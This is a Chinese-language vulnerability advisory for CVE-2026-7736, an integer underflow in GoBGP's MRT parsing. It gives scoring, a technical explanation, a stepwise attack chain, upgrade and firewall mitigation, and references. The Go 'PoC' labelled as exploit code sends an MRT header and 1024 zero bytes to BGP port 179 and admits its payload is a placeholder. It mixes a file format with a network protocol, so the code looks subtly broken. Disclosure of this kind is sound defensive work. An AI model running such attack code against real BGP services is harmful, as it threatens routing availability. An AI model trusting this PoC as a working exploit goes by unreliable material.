CVE-2026-7736 CVSS 7.3 高危

CVE-2026-7736 osrg GoBGP 整数下溢漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7736

漏洞类型

整数下溢

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

osrg GoBGP

漏洞概述

osrg GoBGP 4.3.0及之前版本中的`pkg/packet/mrt/mrt.go`文件`parseRibEntry`函数存在整数下溢漏洞。攻击者可通过网络远程利用该漏洞，无需身份认证和用户交互。成功利用可能导致机密性、完整性及可用性受到低程度影响。建议用户尽快升级至4.4.0版本以修复此问题。

技术细节

该漏洞的核心在于GoBGP项目中的`pkg/packet/mrt/mrt.go`文件内的`parseRibEntry`函数。在解析MRT（Multi-Threaded Routing Toolkit）格式的路由表条目时，代码对从数据包中提取的长度字段执行了减法运算。由于缺乏对该数值的下限检查，攻击者可以构造一个特殊的值，使其在运算后小于零（即发生整数下溢）。在Go语言中，无符号整数下溢会回绕成一个极大的正整数，这可能导致后续的内存分配请求过大的内存空间，或者在数据拷贝时引发缓冲区溢出。攻击者无需进行身份认证，只需向目标GoBGP服务端口发送特制的网络数据包，即可远程触发该漏洞，进而造成服务拒绝（DoS）或在特定条件下导致敏感信息泄露。

攻击链分析

STEP 1

侦察

扫描网络寻找对外开放的GoBGP服务实例，识别其版本信息。

STEP 2

武器化

分析`parseRibEntry`函数逻辑，构造包含特定长度字段的畸形MRT数据包，旨在触发整数下溢。

STEP 3

传递

通过网络向目标GoBGP服务端口发送特制的恶意数据包。

STEP 4

利用

目标服务解析数据包时触发漏洞，导致数值回绕或内存访问越界。

STEP 5

影响

导致GoBGP服务崩溃（DoS）或潜在的信息泄露，影响网络路由稳定性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

package main

import (
	"bytes"
	"encoding/binary"
	"net"
)

// Proof of Concept for CVE-2026-7736
// This PoC demonstrates how to craft a malformed MRT packet
// that triggers the integer underflow in parseRibEntry.
func main() {
	target := "127.0.0.1:179"
	conn, err := net.Dial("tcp", target)
	if err != nil {
		panic(err)
	}
	defer conn.Close()

	// Constructing a minimal MRT header
	buf := new(bytes.Buffer)

	// MRT Header (Timestamp: 0, Type: 13, Subtype: 1, Length: Malicious)
	// Assuming Type 13 is TABLE_DUMPv2 and Subtype 1 is PEER_INDEX_TABLE
	// The vulnerability lies in parsing RIB entries, so we target that.
	binary.Write(buf, binary.BigEndian, uint32(0))     // Timestamp
	binary.Write(buf, binary.BigEndian, uint16(13))    // Type
	binary.Write(buf, binary.BigEndian, uint16(1))     // Subtype
	binary.Write(buf, binary.BigEndian, uint32(1024))  // Length

	// Payload placeholder: In a real exploit, this payload would contain
	// specific TLV structures designed to trigger the underflow in
	// parseRibEntry by supplying a length smaller than expected.
	payload := make([]byte, 1024)
	buf.Write(payload)

	// Send malicious packet
	_, err = conn.Write(buf.Bytes())
	if err != nil {
		panic(err)
	}
}

影响范围

osrg GoBGP <= 4.3.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署防火墙或访问控制列表（ACL），严格限制对GoBGP管理端口的访问来源，仅允许受信任的IP地址连接，并密切监控日志中的异常解析错误。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7736
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7736
3 Details https://www.cvedetails.com/cve/CVE-2026-7736/
4 VulDB https://vuldb.com/cve/CVE-2026-7736
5 Link https://github.com/osrg/gobgp/
6 Link https://github.com/osrg/gobgp/commit/76d911046344a3923cbe573364197aa081944592
7 Link https://github.com/osrg/gobgp/releases/tag/v4.4.0
8 Link https://vuldb.com/submit/807604
9 Link https://vuldb.com/vuln/360911
10 Link https://vuldb.com/vuln/360911/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表